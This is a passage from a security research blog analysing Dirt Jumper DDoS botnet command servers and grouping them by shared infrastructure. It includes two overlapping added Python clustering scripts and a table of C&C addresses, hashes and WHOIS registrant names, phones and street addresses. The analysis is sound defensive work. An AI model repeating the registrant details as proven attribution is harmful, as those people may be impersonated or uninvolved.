</span></ul><div style="font-family: Verdana, sans-serif;"><span style="font-size: small;"> </span> <span style="font-size: small;"></span></div><hr style="font-family: Verdana, sans-serif;" /><div style="font-family: Verdana, sans-serif;"></div><div style="font-family: Verdana, sans-serif;"><span style="font-size: large;"><b>5. Review of other samples, command and control servers and DDoS actor groups</b></span></div><div style="font-family: Verdana, sans-serif;"></div><span style="font-family: Verdana,sans-serif; font-size: small;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;">Analysis of Dirt Jumper C&C servers and their victims was based on publicly available sandbox results from Threatexpert.com, Sssdsandbox.net, Anubis.iseclab.org, and others. The search yielded two dozen C&C servers run by groups of attackers that utilize both types of the bot described in Section <i>1 of this post, Binary analysis and comparison. </i>These were frequently seen on the same domains, for example http://wow-siti.ru/www/m_d.php (type 1) and http://wow-siti.ru/1/index.php (type 2).</span><br />
<span style="font-family: Verdana,sans-serif; font-size: small;"> <br />
The results showed similar naming conventions for the bot executable file name that is normally chosen by the botnet owner. This was seen as identical names or often starting with "sv" like in "sviooue.exe" and "svgtook.exe", as well as the GET or POST URLs for the drone. </span><br />
<br />
<span style="font-family: Verdana,sans-serif; font-size: small;">In addition, some C&C servers had a history of being hosted on the same IP addresses in the past and of being moved simultaneously from one hosting provider to another. Other attribution points included the same email addresses in the domain registration and similar domain names (e.g. <i>xruw0q.com</i>, <i>zprw6q.com</i> and <i>xzrw0q.com</i>; <i>jfasfasfasfasf.com</i> and <i>asdaddddaaaa.com</i>). The resulting matrix clearly shows that seemingly unrelated C&C servers may be operated by the same actors.</span><br />
<br />
<div style="font-family: Verdana, sans-serif;"></div><div class="separator" style="clear: both; font-family: Verdana, sans-serif; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMdldxADlAOIhJRFDy71L6Doa3716jAZW9mTyie2RGNT24Dg4R1U97RvpIvHMVu4kNvLmJRf03zFF2u0DUcD2JNdcp6at8fMROjLMafrE6cLOZqGXuEB5d8Hgn3Y0fCH9U5_4bcAE9CRIC/s1600/groups.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMdldxADlAOIhJRFDy71L6Doa3716jAZW9mTyie2RGNT24Dg4R1U97RvpIvHMVu4kNvLmJRf03zFF2u0DUcD2JNdcp6at8fMROjLMafrE6cLOZqGXuEB5d8Hgn3Y0fCH9U5_4bcAE9CRIC/s640/groups.JPG" width="640" /></a></div></div></div><blockquote><blockquote><div style="background-color: #d9ead3; color: black; text-align: center;"><b>Group 1</b></div><div style="background-color: #d9ead3; color: black; text-align: center;">(abacava.net + asdaddddaaaa.com)</div><div style="background-color: #d9ead3; color: black; text-align: center;">Same email address in domain registration, same hosting</div><div style="background-color: #d9ead3; color: black; text-align: center;">+</div><div style="background-color: #d9ead3; color: black; text-align: center;">(jfasfasfasfasf.com)</div><div style="background-color: #d9ead3; color: black; text-align: center;">History of hosting on the same domains as C&C above</div><div style="background-color: #d9ead3; color: black; text-align: center;">+</div><div style="background-color: #d9ead3; color: black; text-align: center;">(xzrw0q.com+whozdadx.org)<br />
Same bot name</div><div style="background-color: #d9ead3; color: black; text-align: center;">+</div><div style="background-color: #d9ead3; color: black; text-align: center;">(xruw0q.com+zprw6q.com)</div><div style="background-color: #d9ead3; color: black; text-align: center;">same domain naming convention as in xzrw0q.com above</div></blockquote></blockquote><blockquote><blockquote><div style="background-color: #d0e0e3; color: black; text-align: center;"><b>Group 2</b></div><div style="background-color: #d0e0e3; color: black; text-align: center;">(wow-siti.ru + mwas.ru)</div><div style="background-color: #d0e0e3; color: black; text-align: center;">Same email address in domain registration, same hosting</div><div style="background-color: #d0e0e3; color: black; text-align: center;">+</div><div style="background-color: #d0e0e3; color: black; text-align: center;">(s0r.ru)</div><div style="background-color: #d0e0e3; color: black; text-align: center;">Same hosting</div><div style="background-color: #d0e0e3; color: black; text-align: center;">+</div><div style="background-color: #d0e0e3; color: black; text-align: center;">(95.211.63.38) -</div><div style="background-color: #d0e0e3; color: black; text-align: center;">Same bot file name </div></blockquote></blockquote><br />
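<div style="font-family: Verdana, sans-serif;">The "matrix" grouping above is a transitive-closure problem: two C&Cs are linked if they share any attribution feature, and a group is everything reachable through such links. The Python below is an added example written for this edit, not code from the original post; it clusters records transcribed from the infrastructure table in this section (with the asdaddddaaaa.com hosting history taken from the IP list earlier in the post) with union-find, and records which feature justified each merge so the grouping can be explained to whoever receives the report. Two feature normalisations are my own choices and are labelled as such in the code: Gmail ignores dots in the local part, so jh.nvns.92@ and j.hnvns.92@ are one mailbox, and a "domain shape" heuristic (letters to a, digits to 0) catches names minted by the same generator such as xzrw0q, xruw0q and zprw6q. The rest of Group 2 (mwas.ru, s0r.ru) is not in the table, so it is not included.</div>

```python
import re
from collections import defaultdict

# Constructed records, transcribed from the infrastructure table in this post.
# "ips" includes historical hosting where the post lists it.
RECORDS = [
    {"domain": "abacava.net",        "ips": {"195.3.145.220"},
     "exe": {"klhkg.exe", "svdhalp.exe"}, "email": "jh.nvns.92@gmail.com"},
    {"domain": "asdaddddaaaa.com",   "ips": {"195.3.145.87", "46.108.225.72"},
     "exe": {"svgtook.exe"},              "email": "j.hnvns.92@gmail.com"},
    {"domain": "jfasfasfasfasf.com", "ips": {"46.108.225.72"},
     "exe": {"svcghkkjl.exe"},            "email": "bezerosavyk@yahoo.com"},
    {"domain": "xzrw0q.com",         "ips": {"31.192.109.164"},
     "exe": {"svdhalp.exe"},              "email": None},
    {"domain": "xruw0q.com",         "ips": {"31.192.109.162"},
     "exe": {"sviooue.exe"},              "email": None},
    {"domain": "whozdadx.org",       "ips": {"77.79.11.86"},
     "exe": {"svdhalp.exe"},              "email": None},
    {"domain": "zprw6q.com",         "ips": {"91.217.153.114"},
     "exe": {"sviooue.exe"},              "email": None},
    {"domain": "wow-siti.ru",        "ips": {"184.22.118.89"},
     "exe": {"svajnager.exe"},            "email": "vzlomaem@xaker.ru"},
]


def normalize_email(addr):
    """Canonical form so near-duplicate registrant addresses collide.
    Gmail ignores dots in the local part (my normalisation choice here)."""
    if not addr:
        return None
    local, _, host = addr.lower().partition("@")
    if host in ("gmail.com", "googlemail.com"):
        local = local.replace(".", "")
    return f"{local}@{host}"


def domain_shape(domain):
    """Heuristic chosen for this example: letters -> 'a', digits -> '0'.
    Names from the same generator (xzrw0q / xruw0q / zprw6q) share a shape."""
    return re.sub(r"\d", "0", re.sub(r"[a-z]", "a", domain.lower()))


def features(rec):
    """Every attribution feature of one record as (kind, value) pairs."""
    feats = {("ip", ip) for ip in rec["ips"]}
    feats |= {("exe", e) for e in rec["exe"]}
    feats.add(("shape", domain_shape(rec["domain"])))
    email = normalize_email(rec["email"])
    if email:
        feats.add(("email", email))
    return feats


def cluster(records):
    """Union-find over shared features. Returns (groups, links): groups as
    sorted domain lists, largest first; links as (domain_a, domain_b, feature)
    so every merge is traceable to the evidence that caused it."""
    parent = list(range(len(records)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]      # path halving
            i = parent[i]
        return i

    first_seen, links = {}, []
    for i, rec in enumerate(records):
        for f in features(rec):
            if f in first_seen:
                j = first_seen[f]
                links.append((records[j]["domain"], rec["domain"], f))
                parent[find(i)] = find(j)
            else:
                first_seen[f] = i
    groups = defaultdict(list)
    for i, rec in enumerate(records):
        groups[find(i)].append(rec["domain"])
    ordered = sorted((sorted(g) for g in groups.values()), key=lambda g: (-len(g), g))
    return ordered, links


if __name__ == "__main__":
    groups, links = cluster(RECORDS)
    for n, g in enumerate(groups, 1):
        print(f"Group {n}: {', '.join(g)}")
    for a, b, f in links:
        print(f"  {a} <-> {b} via {f[0]}={f[1]}")
```

<div style="font-family: Verdana, sans-serif;">The shape heuristic is deliberately coarse and will over-link on very short or very long random labels, which is why the links list matters: a reviewer can reject any single merge and see what falls out of the group. Exact IP matches on shared hosting are also weak on their own; the post strengthens them with registration email and bot file name, and the code treats all features equally only because the original matrix does.</div>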
<br />
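The pivots behind the two groups above (a shared registrant e-mail, a shared hosting IP, a shared bot file name, and a shared domain naming convention) can be applied mechanically. The following Python is an added example written for this post, not the authors' own tooling. It takes the rows of the table in this post (bot name, C&amp;C IP, domain, registrant e-mail and phone, transcribed from the table) and clusters them with a union-find over shared attributes. Two details matter for the result: Gmail ignores dots in the local part, so jh.nvns.92@gmail.com and j.hnvns.92@gmail.com are the same mailbox, and privacy-proxy registrant addresses (whoisservices.cn, privacyprotect.org) are shared by unrelated customers and are never used as a pivot here. The table does not carry the hosting history the post uses to tie in jfasfasfasfasf.com, but its registrant phone number (+1.7814548993) also appears on the abacava.net record, so that pivot is used instead; the NAMING_PATTERN regex is an assumption that encodes the xzrw0q/xruw0q/zprw6q shape.

```python
import re
from collections import defaultdict

# Rows transcribed from the table in this post:
# (bot exe name, C&C IP, C&C domain, registrant e-mail, registrant phone).
# A field the table does not give is None.
ROWS = [
    ("klhkg.exe",     "195.3.145.220",   "abacava.net",        "jh.nvns.92@gmail.com",        "+1.7814548993"),
    ("svdhalp.exe",   "195.3.145.220",   "abacava.net",        "jh.nvns.92@gmail.com",        None),
    ("svgtook.exe",   "195.3.145.87",    "asdaddddaaaa.com",   "j.hnvns.92@gmail.com",        "+1.2147899961"),
    ("svcghkkjl.exe", "46.108.225.72",   "jfasfasfasfasf.com", "bezerosavyk@yahoo.com",       "+1.7814548993"),
    ("svdhalp.exe",   "31.192.109.164",  "xzrw0q.com",         None,                          None),
    ("sviooue.exe",   "31.192.109.162",  "xruw0q.com",         None,                          None),
    ("svdhalp.exe",   "77.79.11.86",     "whozdadx.org",       None,                          None),
    ("sviooue.exe",   "91.217.153.114",  "zprw6q.com",         "gmvjcxkxhs@whoisservices.cn", None),
    ("svajnager.exe", "184.22.118.89",   "wow-siti.ru",        "vzlomaem@xaker.ru",           None),
    ("svflooje.exe",  "184.22.118.89",   "s0r.ru",             "qwer.vdv@gmail.com",          None),
    ("svflooje.exe",  "184.22.243.172",  "mwas.ru",            "vzlomaem@xaker.ru",           None),
    ("svflooje.exe",  "95.211.63.38",    "95.211.63.38",       None,                          None),
    ("svsysnt.exe",   "78.108.84.160",   "startraider.com",    None,                          None),
    ("kmhfoot.exe",   "195.189.226.193", "nntudazashel.ru",    "root@dgrad-host.ru",          None),
]

UNKNOWN = {None, "", "unknown", "ip"}
# Privacy-proxy registrant addresses are shared by unrelated customers: never pivot on them.
PRIVACY_PROXY_DOMAINS = {"whoisservices.cn", "privacyprotect.org"}
# Assumed encoding of the naming convention seen in xzrw0q / xruw0q / zprw6q:
# four letters, one digit, one letter.
NAMING_PATTERN = re.compile(r"[a-z]{4}\d[a-z]")


def normalize_email(addr):
    """Lower-case the address; for Gmail drop dots and +tags in the local part,
    because Gmail delivers jh.nvns.92@ and j.hnvns.92@ to the same mailbox."""
    local, _, domain = addr.strip().lower().partition("@")
    if domain in ("gmail.com", "googlemail.com"):
        local = local.split("+", 1)[0].replace(".", "")
    return f"{local}@{domain}"


def pivot_keys(row):
    """Return the (attribute, value) pairs that may link this row to another."""
    exe, ip, domain, email, phone = row
    keys = []
    if exe not in UNKNOWN:
        keys.append(("bot", exe.lower()))
    if ip not in UNKNOWN:
        keys.append(("ip", ip))            # exact-IP match, the narrowest hosting pivot
    if email not in UNKNOWN:
        norm = normalize_email(email)
        if norm.rsplit("@", 1)[1] not in PRIVACY_PROXY_DOMAINS:
            keys.append(("email", norm))
    if phone not in UNKNOWN:
        keys.append(("phone", re.sub(r"\D", "", phone)))
    parts = domain.split(".")
    label = parts[-2] if len(parts) >= 2 else domain   # second-level label, e.g. xzrw0q
    if NAMING_PATTERN.fullmatch(label):
        keys.append(("naming", "4alpha-digit-alpha"))
    return keys


def cluster(rows):
    """Union-find over shared pivot keys; returns domain sets, largest first."""
    parent = list(range(len(rows)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]   # path halving
            i = parent[i]
        return i

    def union(a, b):
        parent[find(a)] = find(b)

    owner = {}   # pivot key -> first row index seen carrying it
    for i, row in enumerate(rows):
        for key in pivot_keys(row):
            if key in owner:
                union(i, owner[key])
            else:
                owner[key] = i
    groups = defaultdict(set)
    for i, row in enumerate(rows):
        groups[find(i)].add(row[2])
    return sorted((frozenset(g) for g in groups.values()), key=len, reverse=True)


if __name__ == "__main__":
    for n, group in enumerate(cluster(ROWS), 1):
        print(f"cluster {n}: {', '.join(sorted(group))}")
```

Running the block prints four clusters: the two large ones match Group 1 and Group 2 above, while startraider.com and nntudazashel.ru, which the post does not assign to either group, stay isolated. The exact-IP hosting pivot is deliberately narrow; pivoting on a /24 or an ASN would also join 195.3.145.220 and 195.3.145.87 directly, but would equally join unrelated customers of the same provider, so such wider pivots are better treated as leads to confirm than as links.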
<div style="border: 3px solid gray; overflow: auto; text-align: left; width: 820px;"><table border="1" cellpadding="2" cellspacing="0"><thead><tr><th>exe name</th><th>C&amp;C IP</th><th>IP location</th><th>Domain URL</th><th>Domain owner</th><th>MD5</th></tr></thead><tbody>
<tr><td>klhkg.exe</td><td>195.3.145.220</td><td>RN Data, SIA Latvia</td><td>http://abacava.net/s4/index.php</td><td>Phinney Business Skye Phinney jh.nvns.92@gmail.com +1.7814548993 fax: +1.6612830438 8536 Kern canyon Road, Sp 35 Bakersfield CA 93306 United States</td><td>4C01B3D5B80E18CE2E981E25740B395A</td></tr>
<tr><td>svdhalp.exe</td><td>195.3.145.220</td><td>RN Data, SIA Latvia</td><td>http://abacava.net/f2/m_d.php</td><td>Phinney Business Skye Phinney jh.nvns.92@gmail.com</td><td>2cc731473ef8d968050aa2c9e914150d</td></tr>
<tr><td>svgtook.exe</td><td>195.3.145.87</td><td>RN Data, SIA Latvia</td><td>http://asdaddddaaaa.com/678/index.php</td><td>Mark Livingston Mark Livingston j.hnvns.92@gmail.com +1.2147899961 fax: +1.2147899961 446 Ridge Point drive Forney TX 75126 United States</td><td>f9a65bc3a197600d23557eceb1f3125c</td></tr>
<tr><td>svcghkkjl.exe</td><td>46.108.225.72</td><td>Pixel View SRL Romania</td><td>http://jfasfasfasfasf.com/887/index.php</td><td>Hartford Business Joe Hartford bezerosavyk@yahoo.com +1.7814548993 fax: +1.7814548993 32 Cedar Street, Apt. #4 Waltham MA 02453 United States</td><td>C0FCBF7B96474DCF074339575EC1EF3B</td></tr>
<tr><td>svdhalp.exe</td><td>31.192.109.164</td><td>Mir Telematiki Ltd Russia</td><td>http://xzrw0q.com/driver32/update/m_d.php</td><td>BIZCN.COM, INC.</td><td>f7c0314fb0fbd52af9d4d721b2c897a2</td></tr>
<tr><td>sviooue.exe</td><td>31.192.109.162</td><td>Ultra Web Solutions India</td><td>http://xruw0q.com/fcfxD/load.php</td><td>No. 61 Wanghai Road, Xiamen Software Park xiamen fujian 361008 China</td><td>6D54FB6753D719CA3EC991A9CBD9743C</td></tr>
<tr><td>svdhalp.exe</td><td>77.79.11.86</td><td>Webhosting, Lithuania</td><td>http://whozdadx.org/c4/m_d.php</td><td>Jabon Lorkan Inconmun Klopi 12 New-York</td><td>627f2bda0c5abe4d3e7ae68b877dcfd0</td></tr>
<tr><td>sviooue.exe</td><td>91.217.153.114</td><td>Alexey Klimenko Ukraine</td><td>http://zprw6q.com/frexpex/index.php</td><td>Whois Privacy gmvjcxkxhs@whoisservices.cn</td><td>79a9327dd9f9911c0f08fd4d3c3b26c8</td></tr>
<tr><td>svajnager.exe</td><td>184.22.118.89</td><td>NOC Scranton PA</td><td>http://wow-siti.ru/1/index.php</td><td>Private Person vzlomaem@xaker.ru ns1.antiddos-servis.ru. ns2.antiddos-servis.ru.</td><td>9277796C0F8EBF1078C52D88E8FAAA5D</td></tr>
<tr><td>svflooje.exe</td><td>184.22.118.89</td><td>NOC Scranton PA</td><td>s0r.ru</td><td>Private Person qwer.vdv@gmail.com</td><td>7CA86FB5C76B74390B4E7200E4A09514</td></tr>
<tr><td>svflooje.exe</td><td>184.22.118.89</td><td>NOC Scranton PA</td><td>unknown</td><td>unknown</td><td>E7B65933F069A81AB089D055D6BDD17A</td></tr>
<tr><td>svflooje.exe</td><td>184.22.243.172</td><td>NOC Los Angeles CA</td><td>http://mwas.ru/666/index.php</td><td>Private Person vzlomaem@xaker.ru ns1.reg.ru. ns2.reg.ru.</td><td>6f610c089205a6433fc56c58e30840d1</td></tr>
<tr><td>svflooje.exe</td><td>95.211.63.38</td><td>LeaseWeb Netherlands</td><td>http://95.211.63.38/index.php</td><td>ip</td><td>5998968B6B92E8B8076A8D846C75B855</td></tr>
<tr><td>svsysnt.exe</td><td>78.108.84.160</td><td>Majordomo Llc Russia</td><td>http://startraider.com/login/index.php</td><td>smk.majordomo.ru Alex Leman () Fax: 226 E 45th St New York, NY 10017 United States</td><td>D65C7F3B29F162F4104FC150614D5BE7</td></tr>
<tr><td>kmhfoot.exe</td><td>195.189.226.193</td><td>SERVER.UA Ukraine</td><td>http://nntudazashel.ru/dj/a.php</td><td>Private Person root@dgrad-host.ru ns1.vainet.ru. ns2.vainet.ru.</td><td>fb88c02090d9a42fef851b600fd8ec8</td></tr>
<tr><td>svciyyyt.exe</td><td>46.252.130.102</td><td>users Latvia Andrejs Kaminskis</td><td>http://46.252.130.102/www/index.php</td><td>ip</td><td>4E89DF9540358C4524597856D6A08032</td></tr>
<tr><td>unknown</td><td>80.79.118.230</td><td>Aktsiaselts WaveCom Estonia</td><td>http://hotklass.com/a2/index.php</td><td>PrivacyProtect.org Domain Admin (contact@privacyprotect.org) ID#10760, PO Box 16 Note - All Postal Mails Rejected, visit Privacyprotect.org Nobby Beach null, QLD 4218 Australia Tel. +45.369466</td><td>ac65790032bbcdc7f35dce0c0e43c434</td></tr>
<tr><td>svlanager.exe</td><td>94.244.80.5</td><td>UAB KIS Lithuania</td><td>unknown</td><td>unknown</td><td>54DC76D3F0930A88211207453343E5008BA0161E</td></tr>
<tr><td>svlkanager.exe</td><td>unknown</td><td>unknown</td><td>unknown</td><td>unknown</td><td>CDBF7C49E3FDDAACC3154F13CE93521D</td></tr>
<tr><td>svcgoow.exe</td><td>unknown</td><td>unknown</td><td>unknown</td><td>unknown</td><td>f268ee8e4a5091139e5986b23389e80e</td></tr>
</tbody></table></div></div>Andre M. DiMinohttp://www.blogger.com/profile/07255414624107506662noreply@blogger.com0tag:blogger.com,1999:blog-74827929652568895.post-7583876200587627252011-10-10T23:17:00.003-04:002011-10-19T12:55:54.571-04:00Welcome to DeepEnd Research<div>We are pleased to introduce DeepEnd Research, an independent information security research group that will focus on threat and intelligence analysis. Our emphasis will be on malware, exploit analysis, botnet tracking, the underground economy and overall cyberthreats. We will blog about various collection and analysis techniques, observations, and other areas of interest.</div><div><br /></div><div>Another primary goal of DeepEnd Research is to foster collaborative research and analysis efforts with other security groups and organizations. We welcome any opportunities or inquiries as to projects involving common areas of interest.</div><div><br /></div><div>Thank you for visiting, and please feel free to contact any of the contributors via the email address listed in their profile.</div>Andre M. DiMinohttp://www.blogger.com/profile/07255414624107506662noreply@blogger.com2